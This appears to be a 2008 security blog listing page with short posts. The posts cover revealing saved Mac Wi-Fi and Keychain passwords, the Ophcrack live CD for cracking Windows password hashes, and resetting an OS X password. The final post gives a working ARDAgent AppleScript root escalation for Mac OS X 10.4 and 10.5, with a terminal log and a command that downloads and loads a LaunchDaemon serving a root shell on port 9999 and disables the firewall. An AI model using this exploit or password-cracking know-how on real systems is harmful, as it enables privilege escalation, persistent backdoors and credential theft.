pentesting, pci, red team

Recover a Mac WIFI Password

October 19th, 2008 by admin in Apple, Password Info, Wireless

There are a couple of ways to get to this data, including simply using the Keychain Access utility, but probably the easiest way to get to this specific data is to go through Airport System Preferences. Go into the Airport control area of Mac OS X and you’ll find a list of all the different networks you’ve successfully joined in the past, including those with and without passwords.

Open up System Preferences –> Network –> Airport –> Configure…:

Pick the network you need and click on the little “EDIT” button and a new window pops up with specific information on this network:

Click on the “Show Password” checkbox, and ….

The password is shown in hex but dont worry it’ll still work when you paste it into your new WIFI profile if you choose to create one.

Recover Mac OSX Passwords with Keychain

October 18th, 2008 by admin in Apple, Password Info

Have you forgotten a password to a website, email account, or other password? If you use Mac OS X’s Keychain, chances are that your password can be easily retrieved.

First off, open Keychain (located in /Applications/Utilities/).

Once there, scroll through the list of keys until you find the one that you’re looking for. Double click on it and check the box that says, “Show Password.” Once you authenticate with your user credentials, your forgotten password will be displayed in the text box.

OphCrack Live CD – Crack Windows Passwords

September 20th, 2008 by Dev Team in News, Password Info, windows
Ophcrack LiveCD is a free bootable Windows password cracking CD based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

» Runs on Windows, Linux/Unix, Mac OS X, …
» Cracks LM and NTLM hashes.
» Free tables available for Windows XP and Vista.
» Brute-force module for simple passwords.
» LiveCD available to simplify the cracking.
» Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.

Reset a lost OS X password

September 6th, 2008 by admin in Apple, News, Password Info

If you’ve forgotten your Mac’s admin account password, don’t worry. Assuming you haven’t locked out OpenFirmware, it’s a pretty simple task to change your password back to something you know.

Here’s how:

Mac OS X Root Escalation Through AppleScript [Local]

June 15th, 2008 by admin in Apple, News, Uncategorized

Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through
osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘;

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999’ and find yourself at a root shell.

To remove, run ‘launchctl unload’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.